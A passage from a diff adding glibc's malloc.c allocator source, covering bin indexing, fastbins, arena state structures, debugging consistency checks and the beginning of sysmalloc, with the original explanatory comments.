+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   Since the lowest 2 bits in max_fast don't matter in size comparisons,
+   they are used as flags.
+ */
+
+/*
+   FASTCHUNKS_BIT held in max_fast indicates that there are probably
+   some fastbin chunks. It is set true on entering a chunk into any
+   fastbin, and cleared only in malloc_consolidate.
+
+   The truth value is inverted so that have_fastchunks will be true
+   upon startup (since statics are zero-filled), simplifying
+   initialization checks.
+ */
+
+#define FASTCHUNKS_BIT        (1U)
+
+#define have_fastchunks(M)     (((M)->flags & FASTCHUNKS_BIT) == 0)
+#define clear_fastchunks(M)    catomic_or (&(M)->flags, FASTCHUNKS_BIT)
+#define set_fastchunks(M)      catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* ARENA_CORRUPTION_BIT is set if a memory corruption was detected on the
+   arena.  Such an arena is no longer used to allocate chunks.  Chunks
+   allocated in that arena before detecting corruption are not freed.  */
+
+#define ARENA_CORRUPTION_BIT (4U)
+
+#define arena_is_corrupt(A)	(((A)->flags & ARENA_CORRUPTION_BIT))
+#define set_arena_corrupt(A)	((A)->flags |= ARENA_CORRUPTION_BIT)
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks.
+   Setting the value clears fastchunk bit but preserves noncontiguous bit.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+#define get_max_fast() global_max_fast
+
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunked are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called only from within malloc_consolidate, which needs
+   be called in the same contexts anyway.  It is never called directly
+   outside of malloc_consolidate because some optimizing compilers try
+   to inline it at all call points, which turns out not to be an
+   optimization at all. (Inlining it in malloc_consolidate is fine though.)
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  av->flags |= FASTCHUNKS_BIT;
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+
+/* ---------------- Error behavior ------------------------------------ */
+
+#ifndef DEFAULT_CHECK_ACTION
+# define DEFAULT_CHECK_ACTION 3
+#endif
+
+static int check_action = DEFAULT_CHECK_ACTION;
+
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (p) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* cannot run remaining checks until fully initialized */
+  if (av->top == 0 || av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  if (total != 0)
+    assert (have_fastchunks (av));
+  else if (!have_fastchunks (av))
+    assert (total == 0);
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
